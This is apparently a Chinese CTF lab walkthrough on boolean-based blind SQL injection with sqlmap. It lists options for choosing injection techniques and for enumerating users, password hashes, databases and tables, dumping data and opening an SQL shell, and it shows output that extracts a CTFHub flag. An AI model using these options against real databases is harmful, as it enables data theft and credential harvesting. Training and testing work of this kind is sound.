布尔盲注

布尔盲注

1
2
3
4
5
6
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

技术 #

以下选项用于调整特定 SQL 注入技术的测试方法

1
2
3
4
5
6
7
8
9
10
--technique=TECH	#使用的 SQL 注入技术(默认为“BEUSTQ”)
B: Boolean-based blind SQL injection(布尔型盲注)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(联合查询注入)
S: Stacked queries SQL injection(堆查询注入)
T: Time-based blind SQL injection(时间型盲注)
Q: inline Query injection(内联查询注入)

--time-sec=TIMESEC  #设置延时注入的时间(默认为 5)
--second-order=S..  #设置二阶响应的结果显示页面的 URL(该选项用于二阶 SQL 注入)

枚举 #

以下选项用于获取数据库的信息,结构和数据表中的数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
-a, --all          #获取所有信息、数据
-b, --banner        #获取 DBMS banner,返回数据库的版本号
--current-user			#获取 DBMS 当前用户
--current-db			#获取 DBMS 当前数据库
--hostname				#获取 DBMS 服务器的主机名
--is-dba				#探测 DBMS 当前用户是否为 DBA(数据库管理员)
--users					#枚举出 DBMS 所有用户
--passwords				#枚举出 DBMS 所有用户的密码哈希
--privileges			#枚举出 DBMS 所有用户特权级
--roles					#枚举出 DBMS 所有用户角色

--dbs					#枚举出 DBMS 所有数据库
--tables				#枚举出 DBMS 数据库中的所有表
--columns				#枚举出 DBMS 表中的所有列
--schema				#枚举出 DBMS 所有模式
--count					#获取数据表数目
--dump					#导出 DBMS 数据库表项
--stop 10				#只取前10行数据
  
-D DB					#指定要枚举的 DBMS 数据库
-T TBL					#指定要枚举的 DBMS 数据表
-C COL					#指定要枚举的 DBMS 数据列
  
--sql-query=QUERY		#指定要执行的 SQL 语句
--sql-shell				#调出交互式 SQL shell
1
2
3
4
5
6
Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
1
2
3
4
5
6
7
8
9
Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(110) |
+--------+--------------+

1
2
3
4
5
6
7
8
Database: sqli
Table: flag
[1 entry]
+-----------------+
| flag            |
+-----------------+
| ctfhub{9766ed9X |
+-----------------+